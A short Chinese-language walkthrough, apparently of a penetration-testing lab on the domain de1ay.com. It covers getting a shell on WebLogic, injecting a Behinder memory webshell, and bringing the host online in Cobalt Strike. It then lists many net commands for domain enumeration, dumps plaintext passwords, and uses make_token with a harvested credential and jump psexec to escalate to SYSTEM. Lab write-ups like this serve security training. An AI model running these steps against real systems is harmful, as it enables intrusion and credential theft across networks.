外网

信息收集

端口扫描

接着进行了漏洞扫描

发现是weblogic，尝试getshell

注入冰蝎内存马

然后连接

内网

信息收集

先上线cs

然后进行信息收集
shell ipconfig /all
发现域（一般发现的这个也就是域控（DC）)

net view                 # 查看局域网内其他主机名
net config Workstation   # 查看计算机名、全名、用户名、系统版本、工作站、域、登录域
net user                 # 查看本机用户列表
net user /domain         # 查看域用户
net localgroup administrators # 查看本地管理员组（通常会有域用户）
net view /domain         # 查看有几个域
net user 用户名 /domain   # 获取指定域用户的信息
net group /domain        # 查看域里面的工作组，查看把用户分了多少组（只能在域控上操作）
net group 组名 /domain    # 查看域中某工作组
net group "domain admins" /domain  # 查看域管理员的名字
net group "domain computers" /domain  # 查看域中的其他主机名
net group "Domain Controllers" /domain  # 查看域控制器主机名（可能有多台）

可以都尝试一下，看看有没有什么有用的信息

尝试net user /domain时发现，此账号并没有在域内，那我们可以尝试等拿到域内账号在进行信息收集。
接着
tasklist /svc ：查看有没有杀软

两款都是360的杀软
至此该账号的信息收集就这么多
接着我们利用cs的插件尝试抓取明文密码，切换账号试一下

这里尝试正常上线，发现怎么都上线不了
然后就用psexec上线一下

# 1. 在当前 Beacon 的内存中注入 mssql 的凭证
make_token DE1AY.COM\mssql 1qaz@WSX

# 2. 验证凭证是否在内网管道中生效（查看本地C盘，能看成功说明凭证有效）
shell dir \\127.0.0.1\c$

# 3. 使用 psexec 模块，让系统通过你刚刚注入的 Token 去本地派生新用户
# 注意：这里的 2 是你的 SMB 监听器名字
jump psexec 127.0.0.1 2

发现直接上线到了system，无敌了。。。。

先来尝试找一下域控（可以直接使用ping试试）

也可以使用net group "Domain Controllers" /domain来看

然后查看域内都有哪些

至此域内信息收集结束
总结：de1ay.com域内一台web机（10.10.10.80），一台pc机（10.10.10.201），一台DC（10.10.10.10)